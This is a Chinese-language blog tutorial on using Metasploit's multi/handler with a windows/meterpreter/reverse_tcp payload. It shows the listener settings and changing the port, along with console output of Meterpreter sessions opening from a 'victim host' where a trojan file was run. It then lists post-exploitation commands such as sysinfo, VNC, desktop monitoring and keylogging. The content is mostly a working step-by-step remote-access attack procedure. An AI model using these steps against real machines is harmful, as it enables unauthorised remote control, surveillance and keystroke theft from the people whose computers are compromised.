标签:KaliLinux msfvenom metasploit
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报 Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: ‘‘, seh, thread, process, none)
LHOST 172.16.221.243 yes The listen address
LPORT 18609 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target(回显内容)
(4)msf exploit(multi/handler) > set LPORT 12315 将端口修改为生成木马文件时设置监听的端口
LPORT => 12315(回显内容证明修改成功)
(5)msf exploit(multi/handler) > show options查看攻击载荷的配置
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: ‘‘, seh, thread, process, none)
LHOST 172.16.221.243 yes The listen address
LPORT 12315(看这里端口已经更改了) yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
(6)msf exploit(multi/handler) > exploit运行(在受害者主机别忘了运行你的木马文件)
[] Started reverse TCP handler on 172.16.221.243:12315
[] Sending stage (179779 bytes) to 172.16.221.153
[*] Meterpreter session 9 opened (172.16.221.243:12315 -> 172.16.221.153:50596) at 2018-04-27 15:17:12 +0800
[*] Meterpreter session 11 opened (172.16.221.243:12315 -> 172.16.221.153:50679) at 2018-04-27 15:37:31 +0800
出现以上内容即为成功
4.刚才说过图形化方便操作,接下来给大家介绍一些小操作
电脑出现这样代表可以攻击了
鼠标右键会出现可用的载荷
运行一些shell命令,建议用meterpreter shell 来运行shell命令 我在做实验的时候其他的shell命令并不会运行
getuid 获得uid
sysinfo 查看系统
run vnc 开启vnc
getdesktop 远程监控桌面
浏览文件目录
键盘记录器都懂得
基本就是这些小操作
标签:KaliLinux msfvenom metasploit
原文地址:http://blog.51cto.com/superwolf/2108600